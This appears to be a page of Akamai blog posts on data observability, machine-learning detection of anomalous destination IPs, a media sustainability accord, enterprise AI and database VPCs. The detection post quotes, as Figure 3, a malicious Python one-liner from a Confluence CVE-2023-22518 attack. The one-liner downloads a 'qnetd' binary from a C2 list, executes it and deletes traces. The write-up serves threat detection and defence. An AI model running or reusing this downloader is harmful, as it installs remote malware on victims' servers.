Blog

The Power of Data Observability: Your Edge in a Fast-Changing World

by: Andy d'Andilly

In 2012, IBM estimated that 90% of the world’s data had been created in the previous two years. Since then, data has become the fastest growing and most important asset for any organization. Every day, businesses are inundated with more data, higher consumer expectations, and the increasing pressure to make decisions at speed.

Welcome to the era of data observability

For organizations to stand out and truly deliver value, they must see and understand what’s happening across their data landscape, not just guess and hope for the best. That’s where data observability steps up and enables you to drive business change and innovation.

What is data observability?

Data observability isn't just a buzzword; it's a vital set of tools and practices that empower organizations to proactively monitor the health and flow of their data throughout the entire journey from ingestion to consumption. Instead of simply reacting to data issues after they arise, observability enables you to spot potential obstacles before they cause problems.

Seeing your data clearly can transform your business

Platforms like Akamai’s TrafficPeak offer real-time, granular visibility into traffic patterns, data streams, and performance metrics, essentially shining a spotlight into every corner of your data pipelines. 

This deep insight helps you quickly identify bottlenecks, spot anomalies, and find inconsistencies long before they escalate into business-critical issues. Ultimately, data observability doesn't just protect your data quality; it fosters trust and confidence, unleashing the true power of data-driven decision-making.

The need for speed and smarts

The modern world runs on speed. Consumers expect instant gratification and personalized experiences 24/7. To meet these demands, business teams need real-time insights that allow them to pivot, adapt, and innovate without delay. 

During peak periods, every second counts — and any downtime represents a lost opportunity that can’t be recovered. This fundamental shift means data is no longer secondary; it's the primary engine that’s powering every competitive advantage

But a growing volume of data also brings a critical question: How can you truly trust what you're seeing? The smart answer is data observability

When combined with powerful platforms like TrafficPeak, it delivers the confidence necessary to ensure your data is accurate, your insights are reliable, and your business is poised to operate at the velocity your customers expect.

How data observability gives you the edge

Adopting data observability isn't just a smart move; it's absolutely essential for any modern business. It begins with robust data quality assurance, which ensures that you're never flying blind by allowing you to spot errors, duplicates, and outdated information before any of it can lead you astray, thus fostering trustworthy data for consistently better decisions.

Enable faster problem-solving

When issues inevitably arise, data observability enables faster problem-solving by empowering your teams to quickly see and respond. Tools like TrafficPeak quickly pinpoint the root cause, minimize downtime, and keep your business running smoothly.

Facilitate proactive data management

Furthermore, data observability facilitates proactive data management, letting you anticipate changes, optimize performance, and scale confidently as your business grows. TrafficPeak's insights enable seamless resource allocation.

Deliver more value to consumers

Ultimately, by ensuring data you can truly trust, you're empowered to deliver more value to consumers by innovating to provide faster, better, and more personalized experiences that foster lasting customer loyalty.

The observable future: See clearly, lead boldly

Success in today’s business world demands more than just keeping up — it requires setting the pace. With robust data observability, powered by technologies like TrafficPeak, your organization gains the agility to react faster, seize new opportunities, and consistently deliver greater value to customers.  

Data-driven capabilities have evolved — and observability is the force behind this evolution by transforming your data into a transparent and trustworthy asset that builds an organization that’s ready for any challenge. 

In the rush to meet escalating consumer expectations and outperform competitors, data observability isn't optional; it's absolutely essential.  

Observability bridges the critical gap between aspirational decisions and the confident, data-backed choices you can make today. With powerful solutions like TrafficPeak, you gain the clarity to see clearly, lead boldly, and let your data confidently guide your way forward.

Ready to lead with confidence?

Don’t just keep pace — set it. Embrace the power of data observability with Akamai’s TrafficPeak and turn your data into a strategic advantage. Gain the clarity to act faster, the agility to adapt smarter, and the confidence to lead boldly in a data-driven world.

Start your journey toward real-time, reliable insights today.

Tags

How to Secure Enterprise Networks by Identifying Malicious IP Addresses

by: Ido Sakazi & Yonatan Gilvarg

Introduction

Securing enterprise network traffic is crucial in the fight against threat actors who are trying to harm organizations and cause irreparable damage. The identification of new and potentially malicious destination IPs plays a key role in this defense — you can’t protect what you don’t know needs to be protected.

The ability to detect anomalous connections to these previously unseen destination IPs is a powerful tool, providing administrators with insights and warnings about potential threats.

Our focus on previously unseen destination IPs stems from the recognition that threat actors frequently exploit these new IP addresses to bypass traditional security measures, making it essential to prioritize detection efforts accordingly.

In this blog post, we present a machine learning method that detects anomalous connections to new destination IPs that are accessed from network organization nodes. We used the connections’ metadata to create the method. Our approach involves employing the Word2Vec algorithm to represent features associated with destination IPs and apply a final step of autoencoder.

We used this method in a real-world campaign and it led to a successful detection. Suspicious IP addresses are potentially involved in malicious activities — such as command and control (C2) servers, botnets, and phishing domains — so quick detection can be the difference between an alert and an incident.

Identifying a suspicious new destination IP is challenging

We encountered several challenges in our effort to detect and mitigate threats posed by new unseen destination IPs. Because these IPs lack prior reputation or historical data, traditional detection methods are ineffective. Their novelty makes it challenging to distinguish benign first-time communications from malicious ones, as they can resemble everyday traffic patterns.

We found that analyzing the sequence of the source process, destination port, autonomous system number (ASN), and geolocation linked to the destination IP was successful in addressing these challenges. By doing so, we gained more profound insights into the context of network traffic. This approach enabled us to significantly improve our ability to identify and flag suspicious new destination IPs.

Anomaly detection

Our methodology uses machine learning techniques that fit the unique challenges of anomaly detection in network traffic. We gather diverse metadata associated with network traffic data that contains crucial information about source processes, destination ports, ASNs, geolocations, and more. Diverse datasets are required for a thorough analysis, and classification is required for proper output.

We categorize and group the source process and destination port based on their respective roles for easier analysis. For example, we consolidated different Structured Query Language (SQL) servers’ standard ports (such as MSSQL 1433 and MySQL 3306) into a single category: SQL server.

Using machine learning for anomaly detection

We apply the Word2Vec algorithm to capture the semantic similarities between different IPs based on the context of network analysis. Word2Vec, which was originally developed for natural language processing, learns vector representations by analyzing the context in which elements appear.

In our approach, we model sequences of network metadata as input to the algorithm, allowing it to learn meaningful embeddings that reflect behavioral relationships across the network. This enables more effective anomaly detection and pattern recognition.

By representing IPs as high-dimensional vectors, we enable the algorithm to identify patterns of IPs that frequently appear together in network traffic. IPs that are clustered closely in vector space have strong contextual relationships, while outliers or anomalies are positioned farther away. This approach offers valuable insights into the structure and dynamics of the network traffic.

In the final stage of our methodology, we use an autoencoder — a type of artificial neural network designed for unsupervised learning that aims to compress and reconstruct input data efficiently. The autoencoder allows us to detect anomalies in network traffic without relying on labeled training data. This enables our algorithm to adapt to evolving threat scenarios and detect novel attack patterns effectively.

The embedding features are fed into the autoencoder, enabling it to learn and reconstruct normal network traffic patterns (Figure 1). Connections with high reconstruction errors are flagged as potential malicious activity.

Autoencoder Model Fig. 1: Example of an autoencoder model and outputs

Anomaly validation

A core tenet of this methodology is continuous review and learning. By applying our algorithm, we can review all new destination IPs and check each connection between them daily to identify anomalies and, thus, identify potentially malicious behavior.

Figure 2 is a real example of a daily output for a customer. There were 462 new destination IPs in that single day. 

Reconstruction error Fig. 2: Visualization of new IPs in a customer’s network in a single day
  • The horizontal red line represents the threshold for flagging a connection as anomalous. Any connection that results in a reconstruction error above this line would be considered suspicious.

  • The blue dots signify those IPs that our system determined to be benign, as they displayed low reconstruction errors and matched the expected pattern of network behavior. 

  • The orange dot represents a single IP that our analysis flagged as anomalous due to its high reconstruction error. 

The anomaly was subsequently investigated and confirmed to be a component of a campaign attack, underscoring the robustness and critical importance of our detection mechanisms. The next section includes the details of the attack.

How our algorithm successfully detected an attack in a customer environment

New methodology is great in theory, but it must be practical to be truly valuable. We chose to run our algorithm against a previously detected attack, which was part of a known Confluence campaign exploiting the CVE-2023-22518 vulnerability. This attack led to remote code execution and the deployment of ransomware.

In this case, the initial exploitation allowed attackers unauthorized access to the server. They established a connection to a command and control (C2) server via Python and downloaded a malicious file named qnetd (Figure 3).

python3 -c import os,sys,time import platform as p if sys.version_info.major == 3: import urllib.request as u else: import urllib2 as u h = /tmp/lru d = ./qnetd ml = {3x:[i386,i686], 6x:[x86_64,amd64], 3a:[arm], 6a:[aarch64]} try: m = p.machine().lower() if os.popen(id -u).read().strip() == 0: try: os.chdir(/var) except: os.chdir(/tmp) else: os.chdir(/tmp) for l in open(h): for k,al in ml.items(): for a in al: if a == m: l = l+.+k r = u.urlopen(l) with open(d, wb) as f: f.write(r.read()) f.flush() r.close() os.system(chmod +x +d) os.system(chmod 755 +d) os.system(d +  > /dev/null 2>&1 &) time.sleep(5) os.remove(d) os.remove(h) except: if os.path.exists(h): os.remove(h) if os.path.exists(d): os.remove(d) pass
Fig. 3: Malicious python command identified in investigation

We observed two servers communicating with the malicious IP address, which was part of the widespread Atlassian Confluence CVE-2023-22518 campaign from both the Python and qnetd process, which were detected in our method as the Geolocation was anomalous (Figure 4).

Query results Fig. 4: Discovery example

Enabling the proactive identification of suspicious network connections

Detecting anomalous network connections to new destination IPs is a critical aspect of enterprise cybersecurity. By leveraging Word2Vec and autoencoder techniques, our approach analyzes network traffic metadata such as source processes, destination ports, and geolocation to identify potential security threats that might bypass traditional detection methods.

In a real-world case study, our method successfully uncovered a sophisticated attack that was exploiting a Confluence vulnerability (CVE-2023-22518), which demonstrated the method’s effectiveness in detecting a malicious IP that was part of a ransomware deployment campaign.

The technique will enable organizations to proactively identify suspicious network connections by learning and flagging deviations from normal traffic patterns.

Find out more

To learn more about our managed threat hunting service, visit our Akamai Hunt web page.

Tags

Conversations and the Media Climate Accord at IBC2025

by: Mike Mattera

Our customers helped chart our journey

Since 2009, we’ve been on a journey at Akamai to not only advance our own sustainability goals but also to help bring our customers along with us. One of the best lessons I’ve learned in this work is the power of listening.

By asking for honest feedback from our customers, we’ve been able to build a sustainability program that doesn’t just showcase Akamai’s capabilities — it meets our customers where they are.

And here’s the reality: No two customer journeys are alike. Some companies come to us with well-established sustainability strategies and ambitious targets. Others are just starting to think about what sustainability might mean for them.

What we’ve discovered by listening is that, for many organizations, the very first challenge isn’t about data or reporting; it’s simply about setting goals to get started. Without that foundation, it’s hard to tap into the tools and insights that can accelerate real progress.

Enter the Media Climate Accord

This is why I see so much value in the Media Climate Accord (MCA). This new initiative officially launched at IBC2025 to unite the global media and entertainment technology sector around a shared commitment to climate action and net-zero emissions.

It gives the media industry a shared framework and a space for collaboration that makes it easier for companies, regardless of their starting point, to take that critical first step. By aligning on common principles and sharing what works, we can lower the barriers to action and help more organizations build momentum toward decarbonization.

Sustainability isn’t a solo effort

At Akamai, we take pride in being one of those collaborators. We provide the data, the technology, and the expertise to help customers not only set certain goals, but also achieve them with confidence. More important, we do it as part of a larger ecosystem because sustainability isn’t a solo effort. It takes collective action.

Enter the MCA. This initiative is about meeting companies where they are today and giving them the support, the partnerships, and the shared ambition they need to move further and faster.

Together, we have the opportunity to contribute in the effort of supercharging the environmental journey of the media industry and to prove that collaboration really is the fastest path to progress.

Meeting of the minds at IBC2025

As we started to explore this idea with our industry colleagues, we quickly realized that this challenge of setting meaningful sustainability goals is not unique to any one region, industry, or company size. It’s a global issue.

And Akamai is uniquely positioned to help address this issue, given our role at the intersection of technology, media, and customer engagement.

So, we decided to test some of these ideas at this year’s International Broadcasting Convention (IBC) in Amsterdam. In partnership with the Media Technology Sustainability Series (MTSS) and Greening of Streaming, we brought together leaders from across the media, broadcasting, and technology space.

Our goal wasn’t to create another catalog of high-level commitments. Instead, we wanted to talk in real terms about what it takes to set sustainability goals that actually drive change.

What we learned

The conversations we had at IBC2025 were both informative and energizing. This session did not have a hard design, so we could give these leaders the chance to connect organically with industry experts and peers, to unpack what “good” really looks like, and to leave with tangible next steps.

Specifically, we focused on helping attendees:

  • Set bold, yet credible targets that stretch ambition but are achievable

  • Align those targets with business strategy so sustainability isn’t a side project but a driver of value

  • Activate teams and suppliers because goals only matter when they’re operationalized across the ecosystem

Since sustainability touches nearly every part of a business, we also wanted the event to be accessible to professionals who work outside of the sustainability area. That meant bringing in voices from engineering, operations, finance, marketing, and other parts of the business.

Having a mixed group of people in the room, sharing real stories and engaging in a live tabletop discussion, created a space for practical strategies that attendees could act on immediately.

This is exactly the kind of approach we see scaling within the MCA. By fostering collaboration across the media value chain, the MCA creates a framework where companies, whether they’re just starting or already leading, can learn from one another, align on what “good” looks like, and move the industry forward together.

Collective action can supercharge the journey

What excites me most is the potential for collective action.  The MCA embodies the spirit of shared ambition, practical collaboration, and accountability that can transform how the media sector contributes to global decarbonization.

Akamai has prided itself on our role to help make those first steps easier and more impactful for our customers. But the real power comes when the industry acts as one. That’s how we’ll help supercharge the journey, not just for individual companies, but for the entire media ecosystem.

#JoinUs

We came away from this innovative session with insights that will shape how we grow this into a more comprehensive, long-form event. But, more important, we see this as the beginning of an ongoing conversation, not a one-time exchange.

Establishing a direct feedback loop with our customers and peers ensures that what we build will continue to evolve, adapt, and stay relevant as the sustainability landscape shifts in real time.

The launch of the MCA reminds us that the challenges we face are bigger than any one company, and the solutions require collective action. By leaning into collaboration, sharing what works, and being honest about what doesn’t, we can accelerate progress far beyond what any of us could achieve alone.

My three cents

Don’t wait for the perfect plan or the ideal conditions. Let’s commit to bold goals, align them with our businesses, and take action now. Together, we can turn conversations into impact and prove that the media sector has the power to lead on climate action.

If you are a customer who has a question about setting meaningful sustainability goals, please feel free to reach out to us at sustainability@akamai.com.

Tags

The State of Enterprise AI: Why Edge Native Is the Fastest Path to ROI

by: Hana Jeddy

Akamai recently commissioned a study by Forrester, The State of Enterprise AI: Gaining Experience and Managing Risk, to better understand how companies are adopting artificial intelligence (AI) and what they are prioritizing.

We gained some useful insights from that research. For example, 76% of organizations are adopting AI solutions to improve customer experience (CX) and operational efficiency, 71% view customer retention as another leading motivator, and when asked how they measure AI success, respondents pointed to improved CX (75%) and increased revenue (74%), highlighting how tightly customer satisfaction is tied to growth.

But, arguably, the most important thing we learned is that companies are achieving success with AI with a phased adoption pattern.

Enterprise AI adoption is at an inflection point

As Enterprise AI adoption reaches a convergence of growth in scale, maturity, and technical ambition, it is now at an inflection point. Companies are beginning to plan their shift from early adoption to an organization-wide AI rollout, which requires scalable, edge AI setups for optimization.

To prepare sufficiently for this shift, the companies at the forefront of AI adoption are doing two things: They are developing a foundation of low-risk, high-reward AI applications, and they are preparing for more complex AI use in the future by experimenting with the technology today. 

The next wave of AI applications will be more compute intensive and more globally distributed with fast data processing. Imagine real-time language translation at scale during live global events, customer service calls, or in a multiplayer gaming chat — all without downtime. Or think about AI-powered visual search and object recognition that would allow shoppers to snap a photo of a product to find similar items instantly while in a retail store. 

So, the question for technical leaders today is: How do you scale AI in a way that delivers real-time performance, adapts to unpredictable demand, and meets compliance requirements in every region?

Shift to edge native infrastructure to prepare for the future

Companies should consider moving over to an edge native execution model now so that they have the foundation to handle more complex edge AI use cases in the future. Even today, real-world use cases in customer-facing AI are demanding.

Applications such as chatbots, product recommendations, or voice-driven assistants are all latency bound. A few hundred milliseconds can be the difference between delight and frustration. These workloads are also bursty — they spike during flash sales, media events, or viral campaigns. And because they often involve sensitive customer data, they require strict control over where and how information moves.

Traditional cloud models struggle to keep pace with these hurdles. On the other hand, edge native architectures bring computation closer to the user. That means lower latency to protect customer satisfaction, regional deployment that aligns with global ambitions and regulatory rules, and the ability to scale in a way that can absorb sudden traffic peaks without runaway costs.

Shifting to edge native infrastructure for AI adoption can not only get companies through the rest of the early-adoption phase of the AI tech wave, but also prepare them for the future.

Use cases: From theory to practice with AI at the edge

Use case 1: Automated customer service resolution 

Consider automated customer service resolution, one of the top enterprise use cases identified in the Forrester study. Many organizations still rely on human agents to handle large volumes of routine requests, which creates bottlenecks. With an edge native approach, incoming questions can be sorted and triaged directly at the edge. The right requests flow to the right systems with security policies enforced before they ever touch back-end infrastructure.

Lightweight AI models running on Linode Kubernetes Engine (LKE) generate instant, streaming responses, often by pulling data from managed databases or cached content for speed and accuracy. The results are faster response times, lower escalation rates, and higher customer satisfaction. More than half of organizations are already implementing automated resolution, with nearly one-third ranking it as their most critical AI use case.

Use case 2: Personalized recommendations

A second example is personalized recommendations. Whether it’s a retailer suggesting the right product or a media platform curating content, personalization has to feel instantaneous. Edge native deployment allows user behavior data to be collected and processed locally, with built-in privacy protections. Nearby databases and caching can speed the lookup of past interactions while AI models run on LKE or virtual machines, depending on complexity.

The entire cycle (input, inference, and output) can happen in less than 200 milliseconds. This level of responsiveness is why more than half of enterprises already see personalization as a core AI capability, according to the Forrester survey.

The same model can power more complex future use cases, such as visual search (customers upload an image and get instant, AI-enhanced results) or voice-driven applications (low-latency streaming makes conversations feel natural). As organizations push into these new areas, the need for compute and storage closer to users becomes even more pronounced.

Reducing risk with the right stack

For AI to succeed at scale, engineers need a platform built for resilience, predictability, and security. This is Akamai’s vision: Build a stack that not only supports today’s workloads in core regions but also evolves to bring AI closer to users in the future.

Today, the App Platform helps teams simplify deployment by integrating open source projects into a production-ready environment, reducing the complexity of standing up applications. LKE makes it easy to rapidly deploy models with autoscaling, paired with a flat-rate pricing model that keeps costs predictable even during periods of bursty demand.

Managed databases deliver low-latency reads and built-in failover to safeguard customer-critical paths, while virtual machines provide the flexibility for long-running or specialized workloads, all supported by Zero Trust integration.

What ties these components together, now and in the future, is proximity and predictability. AI applications can already run with stable costs and reliable performance across Akamai’s global footprint, and the trajectory is moving toward extending these benefits even closer to customers as GPU and platform availability continue to expand.

Security and compliance by design

A major hurdle when it comes to scaling AI is convincing both companies and customers that they can trust the technology. According to the Forrester study, 63% of organizations cite security as a concern, 55% worry about compliance, and 45% fear damage to the brand’s reputation if things go wrong. These risks are real, but they can be mitigated with a security-first approach built directly into the edge.

Edge native models allow policies to be enforced before requests ever reach an AI system. Traffic can be isolated, rate limited, and filtered through firewalls and bot defenses. Zero Trust principles apply not only to users but also to workloads themselves.

Additionally, enterprises can adopt safe deployment practices such as canary rollouts, in which new features are tested on a small fraction of users, and red-team exercises to uncover weaknesses before they affect customers. For organizations that feel their current platforms leave gaps, prebuilt reference architectures and Golden Paths offer a way to build consistently and securely without starting from scratch.

With an edge native model, companies can safeguard both the brand and the customer experience while continuing to innovate.

The 3 phases of global AI adoption at the edge

One of the most important lessons from Forrester’s data on enterprise adoption patterns is that AI does not need to be rolled out everywhere at once. A phased approach allows organizations to balance ambition with risk management.

Phase 1

Companies leading the charge with AI typically start with a focused pilot like automated service resolution for a specific support queue. They define clear success metrics — such as response times, automation rates, and escalation thresholds — and establish guardrails to manage risk.

Phase 2

Once the pilot delivers results, the next phase is about scaling. This might mean extending personalization across multiple customer touchpoints, such as a website and a mobile app, and deploying the capability across several regions. This step reflects the near-term global ambitions that more than 70% of enterprises report.

Phase 3

Finally, in Phase 3, organizations broaden their use of AI into newer areas like visual search or procedural content creation. By this point, they’ve established strong standards for performance and safety, making it possible to innovate responsibly.

AI foundations on the edge

The data tells us that enterprises are going all in on AI. Adoption rates are high, companies are actively connecting AI applications to return on investment (ROI), and many have clear goals to take the technology global. Success will depend on execution.

Customer-facing AI applications are latency bound, full of spikes, and data sensitive. Edge native models provide a better path to delivering the infrastructure that enterprise AI requires.

For AI engineers, the challenge is to build smarter applications in a way that customers can trust and businesses can scale. At Akamai, we believe the edge is where enterprise AI ambitions meet reality. Our distributed platform is built to help organizations deploy AI globally without sacrificing security, performance, or compliance.

Learn more

For all the results, download the full Forrester report.

Tags

Isolate Your Database: VPC for Managed Databases Is Available Now

by: Prasoon Pushkar

Since we initially launched Akamai Managed Databases in 2024, some of our largest customers have used these managed databases to accelerate application development while reducing operational overhead. 

Now, our Managed Database offering is even better with virtual private cloud (VPC) capabilities — available in open beta today — that allow customers to place their database instances behind a private network for enhanced security and performance.

A VPC is an isolated network that enables cloud resources to communicate with one another privately, and selectively gate access to the public internet or other private networks. VPCs are critical for shielding database resources from unauthorized traffic and minimizing the database's attack surface area for potential security threats.

Why VPC is essential for databases

Modern enterprises face a critical challenge: Database workloads distributed across multiple managed instances need secure communication without public internet exposure. VPC addresses this challenge by creating a logically isolated network environment that makes security the foundation of your database architecture.

Key benefits of VPC for Managed Databases

  • Network isolation: Database resources operate within completely isolated network boundaries.

  • Private IP communication: All database traffic uses private addresses, eliminating external exposure.

  • Cost optimization: Enterprise customers that move large datasets can achieve significant savings by keeping traffic within the private network and reducing data transfer charges for communication between database instances. 

  • Better performance: Direct private network paths eliminate internet routing overhead.

Key points to consider while using VPC for Managed Database

  • IPv4 support: Full IPv4 networking (IPv6 support coming soon)

  • Custom network configuration: Define IP ranges and subnets

  • Access control list: Granular firewall rules for database access

  • Multisubnet architecture: Separate network segments for different database tiers

Note: Cross-region VPC support is not currently available, and VPC for Managed Databases is only currently available in the new core compute regions.

Getting started

VPC integrates with the existing Akamai database services. Users can migrate existing databases into VPC environments or deploy new databases directly within private networks.

Database security now extends beyond access control to include network-level isolation. It provides the secure foundation necessary to protect valuable data assets while enabling the agility that modern businesses demand.

Set up your own isolated virtual private cloud, and create new databases or bring in existing ones. (A database needs to be in the same region where the VPC is created.) Follow our step-by-step guide.

Tags